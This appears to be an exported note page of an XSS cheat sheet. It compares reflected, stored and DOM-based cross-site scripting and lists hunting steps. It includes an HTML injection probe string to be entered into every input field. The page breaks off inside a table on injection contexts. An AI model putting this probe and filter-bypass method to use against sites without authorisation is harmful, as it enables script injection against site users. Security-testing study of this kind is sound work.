<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>XSS Cheat sheet</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}
.select-value-color-default { background-color: rgba(206,205,202,0.5); }
.select-value-color-gray { background-color: rgba(155,154,151, 0.4); }
.select-value-color-brown { background-color: rgba(140,46,0,0.2); }
.select-value-color-orange { background-color: rgba(245,93,0,0.2); }
.select-value-color-yellow { background-color: rgba(233,168,0,0.2); }
.select-value-color-green { background-color: rgba(0,135,107,0.2); }
.select-value-color-blue { background-color: rgba(0,120,223,0.2); }
.select-value-color-purple { background-color: rgba(103,36,222,0.2); }
.select-value-color-pink { background-color: rgba(221,0,129,0.2); }
.select-value-color-red { background-color: rgba(255,0,26,0.2); }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="5c643ce5-6d1e-4ed9-871f-dd909ded017e" class="page sans"><header><h1 class="page-title">XSS Cheat sheet</h1></header><div class="page-body"><p id="083aa38f-85dd-4845-9711-e4f7c592eef6" class="">
</p><nav id="5343e28d-6fbe-4531-80c0-c9130a721f1c" class="block-color-gray table_of_contents"><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#d1eaf780-ce81-4e63-8200-3b240a0e5605">Active XSS hunting</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#7fe76191-aea8-4ef4-9a2b-c911a7a033ee">Attack strategy</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#590d3924-5564-4c9a-a7ea-5b9431c9e2fa">Passive XSS hunting</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#6df11c27-1038-4896-abd0-2fe23d25e16d">Attack strategy</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#9cdac75d-170c-49cf-9a65-b7042c3f6905">Filter evasion</a></div></nav><h1 id="d1eaf780-ce81-4e63-8200-3b240a0e5605" class="">Active XSS hunting</h1><h2 id="7fe76191-aea8-4ef4-9a2b-c911a7a033ee" class="">Attack strategy</h2><div id="f9e208de-ac54-4d62-8aeb-1522700c8975" class="collection-content"><h4 class="collection-title">Types of XSS</h4><table class="collection-content"><thead><tr><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesTitle"><path d="M7.73943662,8.6971831 C7.77640845,8.7834507 7.81338028,8.8943662 7.81338028,9.00528169 C7.81338028,9.49823944 7.40669014,9.89260563 6.91373239,9.89260563 C6.53169014,9.89260563 6.19894366,9.64612676 6.08802817,9.30105634 L5.75528169,8.33978873 L2.05809859,8.33978873 L1.72535211,9.30105634 C1.61443662,9.64612676 1.2693662,9.89260563 0.887323944,9.89260563 C0.394366197,9.89260563 0,9.49823944 0,9.00528169 C0,8.8943662 0.0246478873,8.7834507 0.0616197183,8.6971831 L2.46478873,2.48591549 C2.68661972,1.90669014 3.24119718,1.5 3.90669014,1.5 C4.55985915,1.5 5.12676056,1.90669014 5.34859155,2.48591549 L7.73943662,8.6971831 Z M2.60035211,6.82394366 L5.21302817,6.82394366 L3.90669014,3.10211268 L2.60035211,6.82394366 Z M11.3996479,3.70598592 C12.7552817,3.70598592 14,4.24823944 14,5.96126761 L14,9.07922535 C14,9.52288732 13.6549296,9.89260563 13.2112676,9.89260563 C12.8169014,9.89260563 12.471831,9.59683099 12.4225352,9.19014085 C12.028169,9.6584507 11.3257042,9.95422535 10.5492958,9.95422535 C9.60035211,9.95422535 8.47887324,9.31338028 8.47887324,7.98239437 C8.47887324,6.58978873 9.60035211,6.08450704 10.5492958,6.08450704 C11.3380282,6.08450704 12.040493,6.33098592 12.4348592,6.81161972 L12.4348592,5.98591549 C12.4348592,5.38204225 11.9172535,4.98767606 11.1285211,4.98767606 C10.6602113,4.98767606 10.2411972,5.11091549 9.80985915,5.38204225 C9.72359155,5.43133803 9.61267606,5.46830986 9.50176056,5.46830986 C9.18133803,5.46830986 8.91021127,5.1971831 8.91021127,4.86443662 C8.91021127,4.64260563 9.0334507,4.44542254 9.19366197,4.34683099 C9.87147887,3.90316901 10.6232394,3.70598592 11.3996479,3.70598592 Z M11.1778169,8.8943662 C11.6830986,8.8943662 12.1760563,8.72183099 12.4348592,8.37676056 L12.4348592,7.63732394 C12.1760563,7.29225352 11.6830986,7.11971831 11.1778169,7.11971831 C10.5616197,7.11971831 10.056338,7.45246479 10.056338,8.0193662 C10.056338,8.57394366 10.5616197,8.8943662 11.1778169,8.8943662 Z M0.65625,11.125 L13.34375,11.125 C13.7061869,11.125 14,11.4188131 14,11.78125 C14,12.1436869 13.7061869,12.4375 13.34375,12.4375 L0.65625,12.4375 C0.293813133,12.4375 4.43857149e-17,12.1436869 0,11.78125 C-4.43857149e-17,11.4188131 0.293813133,11.125 0.65625,11.125 Z"></path></svg></span>a</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>Reflected XSS-</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>Stored XSS</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>DOM XSS</th></tr></thead><tbody><tr id="8b259d50-6882-47df-a63b-88fe9d8efa33"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975/Value%20reflection%208b259d50688247dfa63b88fe9d8efa33.html">Value reflection</a></td><td class="cell-ppKP">Value is not stored in database but instead from a GET or POST parameter</td><td class="cell-U@Pl">Value is stored in database and gotten from there</td><td class="cell-?Y&gt;@">Value gets put into DOM Sink</td></tr><tr id="8e357448-58e8-47a9-8f1e-c476fc93d824"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975/Test%20objectives%208e35744858e847a98f1ec476fc93d824.html">Test objectives</a></td><td class="cell-ppKP">Identify where a value is stored into the DB and reflected back onto the page + Assess the input they accept and see if we
can&#x27;t pass around any filters</td><td class="cell-U@Pl">Identify where a value is reflected into the response + Assess the input they accept and see if we
can&#x27;t pass around any filters</td><td class="cell-?Y&gt;@">Identify where a value is put into a DOM sink and reflected back onto the page + Assess the input they accept and see if we
can&#x27;t pass around any filters</td></tr><tr id="63421007-b22b-491b-9290-d2789df4c8e7"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975/Step%201%2063421007b22b491b9290d2789df4c8e7.html">Step 1</a></td><td class="cell-ppKP">Detect input vectors by testing ALL parameters</td><td class="cell-U@Pl">Detect input vectors by testing ALL parameters</td><td class="cell-?Y&gt;@">Static code review works best for this</td></tr><tr id="2666a636-c3b3-495e-b36f-77acd72ac35c"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975/Step%202%202666a636c3b3495eb36f77acd72ac35c.html">Step 2</a></td><td class="cell-ppKP">Analyse the results depending on the context</td><td class="cell-U@Pl">Analyse the results depending on the context</td><td class="cell-?Y&gt;@">Find the DOM sinks by entering a random value and looking at the developer console, try to find the value where it is reflected and the context</td></tr><tr id="76a1d746-2548-47bf-a08a-76e7bdd956d9"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975/Step%203%2076a1d746254847bfa08a76e7bdd956d9.html">Step 3</a></td><td class="cell-ppKP">Check impact of attack vector</td><td class="cell-U@Pl">Check impact of attack vector</td><td class="cell-?Y&gt;@">Attacker MUST use developer console and not inspect source as that will not show DOM elements</td></tr><tr id="46eae952-fe8c-43fd-8a9c-d9f71c1157c6"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975/Untitled%2046eae952fe8c43fd8a9cd9f71c1157c6.html">Untitled</a></td><td class="cell-ppKP"></td><td class="cell-U@Pl"></td><td class="cell-?Y&gt;@"></td></tr></tbody></table></div><h1 id="590d3924-5564-4c9a-a7ea-5b9431c9e2fa" class="">Passive XSS hunting</h1><h2 id="6df11c27-1038-4896-abd0-2fe23d25e16d" class="">Attack strategy</h2><p id="d477e50f-384f-4266-bafc-145341b08abd" class="">Enter &quot;&#x27;`&gt;&lt;u&gt;Rat was here&lt;img src=x&gt; into every fields that you see.</p><ul id="be91ae88-be1c-481f-9368-9205a228764f" class="bulleted-list"><li>Name, last name, adress,... at registration</li></ul><ul id="e46e39c6-8a70-4d3f-a3e6-fa3111027462" class="bulleted-list"><li>Names and content of ever object you create</li></ul><ul id="5fa3f605-0293-46ba-b0ff-814fdc7e088b" class="bulleted-list"><li>EVERYWHERE</li></ul><p id="8c4912b7-78c6-4d3d-9f82-1f1674d2b3ef" class="">If you encounter a value that&#x27;s reflected, determine context.</p><div id="8aae6c79-6a57-4130-99e7-e4fdd0ef5709" class="collection-content"><h4 class="collection-title">Contexts</h4><table class="collection-content"><thead><tr><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>Column</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesTitle"><path d="M7.73943662,8.6971831 C7.77640845,8.7834507 7.81338028,8.8943662 7.81338028,9.00528169 C7.81338028,9.49823944 7.40669014,9.89260563 6.91373239,9.89260563 C6.53169014,9.89260563 6.19894366,9.64612676 6.08802817,9.30105634 L5.75528169,8.33978873 L2.05809859,8.33978873 L1.72535211,9.30105634 C1.61443662,9.64612676 1.2693662,9.89260563 0.887323944,9.89260563 C0.394366197,9.89260563 0,9.49823944 0,9.00528169 C0,8.8943662 0.0246478873,8.7834507 0.0616197183,8.6971831 L2.46478873,2.48591549 C2.68661972,1.90669014 3.24119718,1.5 3.90669014,1.5 C4.55985915,1.5 5.12676056,1.90669014 5.34859155,2.48591549 L7.73943662,8.6971831 Z M2.60035211,6.82394366 L5.21302817,6.82394366 L3.90669014,3.10211268 L2.60035211,6.82394366 Z M11.3996479,3.70598592 C12.7552817,3.70598592 14,4.24823944 14,5.96126761 L14,9.07922535 C14,9.52288732 13.6549296,9.89260563 13.2112676,9.89260563 C12.8169014,9.89260563 12.471831,9.59683099 12.4225352,9.19014085 C12.028169,9.6584507 11.3257042,9.95422535 10.5492958,9.95422535 C9.60035211,9.95422535 8.47887324,9.31338028 8.47887324,7.98239437 C8.47887324,6.58978873 9.60035211,6.08450704 10.5492958,6.08450704 C11.3380282,6.08450704 12.040493,6.33098592 12.4348592,6.81161972 L12.4348592,5.98591549 C12.4348592,5.38204225 11.9172535,4.98767606 11.1285211,4.98767606 C10.6602113,4.98767606 10.2411972,5.11091549 9.80985915,5.38204225 C9.72359155,5.43133803 9.61267606,5.46830986 9.50176056,5.46830986 C9.18133803,5.46830986 8.91021127,5.1971831 8.91021127,4.86443662 C8.91021127,4.64260563 9.0334507,4.44542254 9.19366197,4.34683099 C9.87147887,3.90316901 10.6232394,3.70598592 11.3996479,3.70598592 Z M11.1778169,8.8943662 C11.6830986,8.8943662 12.1760563,8.72183099 12.4348592,8.37676056 L12.4348592,7.63732394 C12.1760563,7.29225352 11.6830986,7.11971831 11.1778169,7.11971831 C10.5616197,7.11971831 10.056338,7.45246479 10.056338,8.0193662 C10.056338,8.57394366 10.5616197,8.8943662 11.1778169,8.8943662 Z M0.65625,11.125 L13.34375,11.125 C13.7061869,11.125 14,11.4188131 14,11.78125 C14,12.1436869 13.7061869,12.4375 13.34375,12.4375 L0.65625,12.4375 C0.293813133,12.4375 4.43857149e-17,12.1436869 0,11.78125 C-4.43857149e-17,11.4188131 0.293813133,11.125 0.65625,11.125 Z"></path></svg></span>JavaScript context</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 